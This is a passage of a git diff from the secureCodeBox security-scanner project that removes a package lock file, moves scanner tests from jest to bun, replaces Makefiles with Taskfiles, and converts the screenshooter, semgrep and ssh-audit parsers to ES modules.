"resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true - }, - "source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "requires": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - }, - "sshpk": { - "version": "1.17.0", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.17.0.tgz", - "integrity": "sha512-/9HIEs1ZXGhSPE8X6Ccm7Nam1z8KcoCqPdI7ecm1N33EzAetWahvQWVqLZtaZQ+IDKX4IyA2o0gBzqIMkAagHQ==", - "dev": true, - "requires": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" - } - }, - "stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "requires": { - "escape-string-regexp": "^2.0.0" - } - }, - "stream-buffers": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", - "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==", - "dev": true - }, - "string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "requires": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - } - }, - "string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dev": true, - "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - } - }, - "strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dev": true, - "requires": { - "ansi-regex": "^5.0.1" - } - }, - "strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true - }, - "strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true - }, - "strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true - }, - "supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - }, - "supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true - }, - "tar": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/tar/-/tar-6.2.1.tgz", - "integrity": "sha512-DZ4yORTwrbTj/7MZYq2w+/ZFdI6OZ/f9SFHR+71gIVUZhOQPHzVCLpvRnPgyaMpfWxxk/4ONva3GQSyNIKRv6A==", - "dev": true, - "requires": { - "chownr": "^2.0.0", - "fs-minipass": "^2.0.0", - "minipass": "^5.0.0", - "minizlib": "^2.1.1", - "mkdirp": "^1.0.3", - "yallist": "^4.0.0" - }, - "dependencies": { - "minipass": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-5.0.0.tgz", - "integrity": "sha512-3FnjYuehv9k6ovOEbyOswadCDPX1piCfhV8ncmYtHOjuPwylVWsghTLo7rabjC3Rx5xD4HDx8Wm1xnMF7S5qFQ==", - "dev": true - } - } - }, - "test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "requires": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - } - }, - "tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "requires": { - "is-number": "^7.0.0" - } - }, - "tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", - "dev": true, - "requires": { - "psl": "^1.1.28", - "punycode": "^2.1.1" - } - }, - "ts-jest": { - "version": "29.2.5", - "resolved": "https://registry.npmjs.org/ts-jest/-/ts-jest-29.2.5.tgz", - "integrity": "sha512-KD8zB2aAZrcKIdGk4OwpJggeLcH1FgrICqDSROWqlnJXGCXK4Mn6FcdK2B6670Xr73lHMG1kHw8R87A0ecZ+vA==", - "dev": true, - "requires": { - "bs-logger": "^0.2.6", - "ejs": "^3.1.10", - "fast-json-stable-stringify": "^2.1.0", - "jest-util": "^29.0.0", - "json5": "^2.2.3", - "lodash.memoize": "^4.1.2", - "make-error": "^1.3.6", - "semver": "^7.6.3", - "yargs-parser": "^21.1.1" - }, - "dependencies": { - "semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true - } - } - }, - "tslib": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.5.0.tgz", - "integrity": "sha512-336iVw3rtn2BUK7ORdIAHTyxHGRIHVReokCR3XjbckJMK7ms8FysBfhLR8IXnAgy7T0PTPNBWKiH514FOW/WSg==", - "dev": true - }, - "tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha1-J6XeoGs2sEoKmWZ3SykIaPD8QP0=", - "dev": true, - "requires": { - "safe-buffer": "^5.0.1" - } - }, - "tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha1-WuaBd/GS1EViadEIr6k/+HQ/T2Q=", - "dev": true - }, - "type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true - }, - "type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true - }, - "typescript": { - "version": "5.7.2", - "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.7.2.tgz", - "integrity": "sha512-i5t66RHxDvVN40HfDd1PsEThGNnlMCMT3jMUuoh9/0TaqWevNontacunWyN02LA9/fIbEWlcHZcgTKb9QoaLfg==", - "dev": true, - "peer": true - }, - "undici-types": { - "version": "6.19.8", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.19.8.tgz", - "integrity": "sha512-ve2KP6f/JnbPBFyobGHuerC9g1FYGn/F8n1LWTwNxCEzd6IfqTwUQcNXgEtmmQ6DlRrC1hrSrBnCZPokRrDHjw==", - "dev": true - }, - "update-browserslist-db": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.1.1.tgz", - "integrity": "sha512-R8UzCaa9Az+38REPiJ1tXlImTJXlVfgHZsglwBD/k6nj76ctsH1E3q4doGrukiLQd3sGQYu56r5+lo5r94l29A==", - "dev": true, - "requires": { - "escalade": "^3.2.0", - "picocolors": "^1.1.0" - } - }, - "uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "dev": true, - "requires": { - "punycode": "^2.1.0" - } - }, - "uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", - "dev": true - }, - "v8-to-istanbul": { - "version": "9.3.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.3.0.tgz", - "integrity": "sha512-kiGUalWN+rgBJ/1OHZsBtU4rXZOfj/7rKQxULKlIzwzQSvMJUUNgPwJEEh7gU6xEVxC0ahoOBvN2YI8GH6FNgA==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^2.0.0" - } - }, - "verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha1-OhBcoXBTr1XW4nDB+CiGguGNpAA=", - "dev": true, - "requires": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" - } - }, - "walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "requires": { - "makeerror": "1.0.12" - } - }, - "which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dev": true, - "requires": { - "isexe": "^2.0.0" - } - }, - "wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "requires": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - } - }, - "wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha1-tSQ9jz7BqjXxNkYFvA0QNuMKtp8=", - "dev": true - }, - "write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "requires": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - } - }, - "ws": { - "version": "8.12.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.12.0.tgz", - "integrity": "sha512-kU62emKIdKVeEIOIKVegvqpXMSTAMLJozpHZaJNDYqBjzlSYXQGviYwN1osDLJ9av68qHd4a2oSjd7yD4pacig==", - "dev": true, - "requires": {} - }, - "y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true - }, - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - }, - "yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "requires": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - } - }, - "yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true - }, - "yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true } } } diff --git a/scanners/package.json b/scanners/package.json index 7c5a28d7e4..3ff9a85a84 100644 --- a/scanners/package.json +++ b/scanners/package.json @@ -9,8 +9,8 @@ }, "main": "index.js", "scripts": { - "test:unit": "jest --verbose --testPathIgnorePatterns /integration-tests/ --ci --colors --coverage --passWithNoTests", - "test:integration": "jest --verbose --ci --colors --coverage --passWithNoTests" + "test:unit": "bun test */parser/*.test.js", + "test:integration": "bun test */integration-tests/*.test.js" }, "keywords": [ "secureCodeBox", @@ -37,12 +37,7 @@ }, "license": "Apache-2.0", "devDependencies": { - "@kubernetes/client-node": "^0.19.0", - "@securecodebox/parser-sdk-nodejs": "file:../parser-sdk/nodejs", - "jest": "^29.7.0", - "prettier": "^3.4.2", - "@types/jest": "^29.5.14", - "ts-jest": "^29.2.5" + "@securecodebox/parser-sdk-nodejs": "file:../parser-sdk/nodejs" }, "dependencies": {} -} +} \ No newline at end of file diff --git a/scanners/screenshooter/Makefile b/scanners/screenshooter/Makefile deleted file mode 100644 index c4dbfc4f4f..0000000000 --- a/scanners/screenshooter/Makefile +++ /dev/null @@ -1,15 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = screenshooter -custom_scanner = set - -include ../../scanners.mk - -.PHONY: deploy-test-deps -deploy-test-deps: deploy-test-dep-nginx diff --git a/scanners/screenshooter/Taskfile.yaml b/scanners/screenshooter/Taskfile.yaml new file mode 100644 index 0000000000..11e85fd93f --- /dev/null +++ b/scanners/screenshooter/Taskfile.yaml @@ -0,0 +1,20 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3.44.0" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + excludes: + - predeploy + vars: + scannerName: screenshooter + +tasks: + predeploy: + deps: + - demo-targets:deploy:nginx + cmds: [] diff --git a/scanners/screenshooter/integration-tests/screenshooter.test.js b/scanners/screenshooter/integration-tests/screenshooter.test.js index 7110fde2bf..53ad6c300e 100644 --- a/scanners/screenshooter/integration-tests/screenshooter.test.js +++ b/scanners/screenshooter/integration-tests/screenshooter.test.js @@ -2,7 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); +import { scan } from "../../../tests/integration/helpers.js"; test( "make screenshot of nginx demo target", @@ -11,10 +11,10 @@ test( "demo-target-screenshot", "screenshooter", ["http://nginx.demo-targets.svc"], - 60 * 4 + 60 * 4, ); - expect(categories).toEqual({"Screenshot":1}); - }, 60*1000 + expect(categories).toEqual({ Screenshot: 1 }); + }, + { timeout: 60 * 1000 }, ); -2 \ No newline at end of file diff --git a/scanners/screenshooter/parser/package-lock.json b/scanners/screenshooter/parser/package-lock.json deleted file mode 100644 index acf9b084b8..0000000000 --- a/scanners/screenshooter/parser/package-lock.json +++ /dev/null @@ -1,14 +0,0 @@ -{ - "name": "@securecodebox/parser-screenshooter", - "version": "1.0.0", - "lockfileVersion": 2, - "requires": true, - "packages": { - "": { - "name": "@securecodebox/parser-screenshooter", - "version": "1.0.0", - "license": "Apache-2.0", - "devDependencies": {} - } - } -} diff --git a/scanners/screenshooter/parser/package-lock.json.license b/scanners/screenshooter/parser/package-lock.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/scanners/screenshooter/parser/package-lock.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 diff --git a/scanners/screenshooter/parser/package.json b/scanners/screenshooter/parser/package.json deleted file mode 100644 index 4292c15b2a..0000000000 --- a/scanners/screenshooter/parser/package.json +++ /dev/null @@ -1,11 +0,0 @@ -{ - "name": "@securecodebox/parser-screenshooter", - "version": "1.0.0", - "description": "Parses result files for the type: 'screenshot-png'.", - "main": "", - "scripts": {}, - "keywords": [], - "author": "iteratec GmbH", - "license": "Apache-2.0", - "devDependencies": {} -} diff --git a/scanners/screenshooter/parser/package.json.license b/scanners/screenshooter/parser/package.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/scanners/screenshooter/parser/package.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 diff --git a/scanners/screenshooter/parser/parser.js b/scanners/screenshooter/parser/parser.js index 4b3c3f3856..df64f452af 100644 --- a/scanners/screenshooter/parser/parser.js +++ b/scanners/screenshooter/parser/parser.js @@ -2,10 +2,9 @@ // // SPDX-License-Identifier: Apache-2.0 -async function parse(image, scan) { - +export async function parse(image, scan) { if (image.length === 0) { - return [] + return []; } const websiteUrl = scan.spec.parameters[0]; @@ -25,5 +24,3 @@ async function parse(image, scan) { }, ]; } - -module.exports.parse = parse; diff --git a/scanners/screenshooter/parser/parser.test.js b/scanners/screenshooter/parser/parser.test.js index 85a13aa533..dceabb9798 100644 --- a/scanners/screenshooter/parser/parser.test.js +++ b/scanners/screenshooter/parser/parser.test.js @@ -2,10 +2,8 @@ // // SPDX-License-Identifier: Apache-2.0 -const { parse } = require("./parser"); -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { parse } from "./parser"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; let scan; @@ -47,7 +45,7 @@ test("should create finding correctly", async () => { test("should not create finding if image is empty", async () => { scan.spec.parameters = ["https://www.iteratec.de"]; - const findings = await parse("", scan) + const findings = await parse("", scan); await expect(validateParser(findings)).resolves.toBeUndefined(); expect(findings).toMatchInlineSnapshot(`[]`); }); diff --git a/scanners/semgrep/Makefile b/scanners/semgrep/Makefile deleted file mode 100644 index 3ddf7a279c..0000000000 --- a/scanners/semgrep/Makefile +++ /dev/null @@ -1,20 +0,0 @@ -#!/usr/bin/make -f - -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 - -include_guard = set # Always include this line (checked in the makefile framework) -scanner = semgrep - -include ../../scanners.mk # Ensures that all the default makefile targets are included - -.PHONY: integration-tests -integration-tests: - @echo ".: 🩺 Starting integration test in kind namespace 'integration-tests'." - kubectl -n integration-tests delete scans --all - cd $(PROJECT_DIR)/tests/integration/ && npm ci - cd $(SCANNERS_DIR)/${scanner} - kubectl -n integration-tests create configmap semgrep-test-file --from-file=integration-tests/testfile.py - npm run test:integration -- ${scanner}/integration-tests - kubectl -n integration-tests delete configmap semgrep-test-file diff --git a/scanners/semgrep/Taskfile.yaml b/scanners/semgrep/Taskfile.yaml new file mode 100644 index 0000000000..142059348c --- /dev/null +++ b/scanners/semgrep/Taskfile.yaml @@ -0,0 +1,19 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3.44.0" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + excludes: + - predeploy + vars: + scannerName: semgrep + +tasks: + predeploy: + cmds: + - kubectl -n integration-tests create configmap semgrep-test-file --from-file=integration-tests/testfile.py --dry-run=client -o yaml | kubectl apply -f - diff --git a/scanners/semgrep/integration-tests/semgrep.test.js b/scanners/semgrep/integration-tests/semgrep.test.js index 14c8d47d49..7958084b64 100644 --- a/scanners/semgrep/integration-tests/semgrep.test.js +++ b/scanners/semgrep/integration-tests/semgrep.test.js @@ -2,9 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); - -jest.retryTimes(0); +import { scan } from "../../../tests/integration/helpers.js"; test( "semgrep should find 3 issues in the test file", @@ -36,13 +34,13 @@ test( expect(count).toBe(3); expect(categories).toEqual({ - "security": 3, + security: 3, }); expect(severities).toEqual({ high: 3, }); }, - 3 * 60 * 1000 + { timeout: 3 * 60 * 1000 }, ); /* Disable this rule as it requires access to the Internet and clones a public GitHub repo diff --git a/scanners/semgrep/parser/parser.js b/scanners/semgrep/parser/parser.js index 3ac4404f18..c652f02a37 100644 --- a/scanners/semgrep/parser/parser.js +++ b/scanners/semgrep/parser/parser.js @@ -7,8 +7,15 @@ const severityMap = new Map([ ["warning", "MEDIUM"], ["error", "HIGH"], ]); -async function parse(fileContent) { - return fileContent.results.flatMap((result) => { + +export async function parse(fileContent) { + const report = JSON.parse(fileContent); + + if (!report || !report.results) { + return []; + } + + return report.results.flatMap((result) => { // Assemble location as path to file and line range const location = result.path + ":" + result.start.line + "-" + result.end.line; @@ -78,5 +85,3 @@ async function parse(fileContent) { }; }); } - -module.exports.parse = parse; diff --git a/scanners/semgrep/parser/parser.test.js b/scanners/semgrep/parser/parser.test.js index 01a38dbdb9..97c0e3b40a 100644 --- a/scanners/semgrep/parser/parser.test.js +++ b/scanners/semgrep/parser/parser.test.js @@ -2,21 +2,19 @@ // // SPDX-License-Identifier: Apache-2.0 -const { readFile } = require("fs/promises"); -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { readFile } from "node:fs/promises"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; -const { parse } = require("./parser"); +import { parse } from "./parser"; test("should properly parse file from inline semgrep usage", async () => { - const jsonContent = await readFile( + const fileContent = await readFile( __dirname + "/__testFiles__/minimal-metadata.json", { encoding: "utf8", - } + }, ); - const findings = await parse(JSON.parse(jsonContent)); + const findings = await parse(fileContent); // validate findings await expect(validateParser(findings)).resolves.toBeUndefined(); expect(findings).toMatchInlineSnapshot(` @@ -39,13 +37,13 @@ test("should properly parse file from inline semgrep usage", async () => { }); test("should properly parse file with a single result", async () => { - const jsonContent = await readFile( + const fileContent = await readFile( __dirname + "/__testFiles__/python-injection.json", { encoding: "utf8", - } + }, ); - const findings = await parse(JSON.parse(jsonContent)); + const findings = await parse(fileContent); // validate findings await expect(validateParser(findings)).resolves.toBeUndefined(); expect(findings).toMatchInlineSnapshot(` @@ -81,13 +79,13 @@ test("should properly parse file with a single result", async () => { }); test("should properly parse file with multiple results", async () => { - const jsonContent = await readFile( + const fileContent = await readFile( __dirname + "/__testFiles__/python-injection-multiresult.json", { encoding: "utf8", - } + }, ); - const findings = await parse(JSON.parse(jsonContent)); + const findings = await parse(fileContent); // validate findings await expect(validateParser(findings)).resolves.toBeUndefined(); expect(findings).toMatchInlineSnapshot(` diff --git a/scanners/ssh-audit/Makefile b/scanners/ssh-audit/Makefile deleted file mode 100644 index ba7a9090cd..0000000000 --- a/scanners/ssh-audit/Makefile +++ /dev/null @@ -1,15 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = ssh-audit -custom_scanner = set - -include ../../scanners.mk - -.PHONY: deploy-test-deps -deploy-test-deps: deploy-test-dep-dummy-ssh \ No newline at end of file diff --git a/scanners/ssh-audit/Taskfile.yaml b/scanners/ssh-audit/Taskfile.yaml new file mode 100644 index 0000000000..d67db7f0ce --- /dev/null +++ b/scanners/ssh-audit/Taskfile.yaml @@ -0,0 +1,20 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3.44.0" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + excludes: + - predeploy + vars: + scannerName: ssh-audit + +tasks: + predeploy: + deps: + - demo-targets:deploy:dummy-ssh + cmds: [] diff --git a/scanners/ssh-audit/integration-tests/ssh-audit.test.js b/scanners/ssh-audit/integration-tests/ssh-audit.test.js index 38c2238e74..6606022bda 100644 --- a/scanners/ssh-audit/integration-tests/ssh-audit.test.js +++ b/scanners/ssh-audit/integration-tests/ssh-audit.test.js @@ -2,9 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); - -jest.retryTimes(1); +import { scan } from "../../../tests/integration/helpers.js"; test( "ssh-audit should find a couple of findings for a dummy ssh service", @@ -13,7 +11,7 @@ test( "ssh-audit-dummy-ssh", "ssh-audit", ["dummy-ssh.demo-targets.svc"], - 90 + 90, ); expect(count).toBe(7); expect(categories).toMatchInlineSnapshot(` @@ -30,7 +28,7 @@ test( } `); }, - 3 * 60 * 1000 + { timeout: 3 * 60 * 1000 }, ); test( @@ -41,11 +39,11 @@ test( "ssh-audit-non-existing", "ssh-audit", ["this-target-doesnt-exist.demo-targets.svc"], - 180 - ) + 180, + ), ).rejects.toThrow( - 'Scan failed with description "Failed to run the Scan Container, check k8s Job and its logs for more details"' + 'Scan failed with description "Failed to run the Scan Container, check k8s Job and its logs for more details"', ); }, - 3 * 60 * 1000 + { timeout: 3 * 60 * 1000 }, ); diff --git a/scanners/ssh-audit/parser/parser.js b/scanners/ssh-audit/parser/parser.js index c9b1119f98..274fb32bac 100644 --- a/scanners/ssh-audit/parser/parser.js +++ b/scanners/ssh-audit/parser/parser.js 